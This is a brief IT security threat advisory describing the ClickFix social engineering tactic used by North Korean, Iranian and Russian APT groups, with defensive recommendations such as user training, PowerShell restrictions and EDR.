THREAT BRIEF (HIGH): Microsoft’s April 2025 IT Support

We are pleased to provide the following IT Support Threat Brief for April 2025.

Multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia have been observed leveraging the increasingly prevalent social engineering tactic known as ClickFix to deploy malware over a three-month period from late 2024 through the beginning of 2025.

ClickFix is a social engineering tactic in which malicious websites impersonate legitimate software or document-sharing platforms. These targets are lured through phishing or malvertising, and they are presented with erroneous messages that claim a document or download has failed, the user needs to complete a CAPTCHA verification or need to register their device. This involves deceiving a user into copying and pasting a malicious command into a terminal on their machine under the pretext of fixing these issues.

Security researchers observed the technique used in espionage campaigns by North Korea’s Kimsuky, Iran’s MuddyWater, and the Russian threat actors APT28 and UNK_RemoteRogue. As these threat actors find success, it is likely this tactic will be further adapted by other groups.

Organizations should implement several protective measures to guard against ClickFix and similar social engineering techniques.

• Train users about the ClickFix technique. It is crucial to emphasize that legitimate software would never require the copying and pasting of commands from dialogue boxes.
• Implement PowerShell restrictions such as Constrained Language Mode and script block logging to detect suspicious PowerShell activity.
• Implement robust email filtering solutions to identify and block phishing attempts before they reach users.
• Limit administrative privileges to reduce the impact of successful attacks.
• Implement endpoint detection and response (EDR) solutions that can identify suspicious PowerShell execution patterns.